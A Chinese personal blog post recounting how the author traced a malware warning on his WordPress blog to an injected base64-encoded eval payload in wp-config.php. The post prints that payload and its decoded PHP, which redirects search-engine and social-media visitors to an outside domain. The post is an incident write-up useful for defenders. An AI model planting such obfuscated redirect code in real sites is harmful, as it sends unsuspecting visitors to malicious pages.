博客被挂马了

首先感谢党,感谢人民,感谢给我挂马的人。

 

晚上打开博客,Chrome提示这个:

悲剧1

 

好吧,我被挂马了,提示有恶意软件,点击安全诊断页面链接后,接着在谷歌站长工具那各种查,说我是2.23号检测到恶意软件,于是我打开FTP,检查博客程序,查看2.23号被修改过的。结果没有,我又看24号被修改过的,只有.htaccess和sitemap.xml,检查过也没错。

 

orz,然后继续百度,各种查,把主题啥的都下载了检查,专门正对iframe, js等做了详细检查,发现还是找不出错误。

 

这时,我把Google报毒那里提示有毒的网站丢谷歌里搜索了下,开了几十个网站,突然找到了这个博客。感谢这位兄弟,否则我还没想到wp-config.php会被挂马。

 

打开wp-config.php,果然一大段醒目的eval代码。如下:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKC

EkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9

TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyK

CRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyK

CRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzd

HIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0

cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIH

N0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVw

b24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlci

widGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw

/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cm

wvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKC

RyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpI

HsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW

51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZnJvbGluZy5iZWUucGwvIik7DQple

Gl0KCk7DQp9DQp9DQp9DQp9"));

 

 

经过解密后:

error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER[‘HTTP_REFERER’]; $uag=$_SERVER[‘HTTP_USER_AGENT’]; if ($uag) { if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://froling.bee.pl/"); exit(); } } } }

 

果然就看到这个醒目的网站, fuck the website!

 

最后,我查看了一下我的wp-config.php的修改时间,是2.14号,也就是说早就被挂马了,只是谷歌放检测到!!!!

 

于是我又检查了我同一个虚拟主机下的另外一个博客,悲剧的是,在更早之前,1.30号就被挂过了。。。。

 

 

在解决这个问题的过程中,查了很多网站,总结一下:

http://www.zhanggang.net/wap/index-wap2.php?p=40250

http://www.stopbadware.org/home/security

发布者

Tanky Woo

Tanky Woo,[个人主页:https://tankywoo.com] / [新博客:https://blog.tankywoo.com]

《博客被挂马了》有121个想法

发表评论

电子邮件地址不会被公开。 必填项已用*标注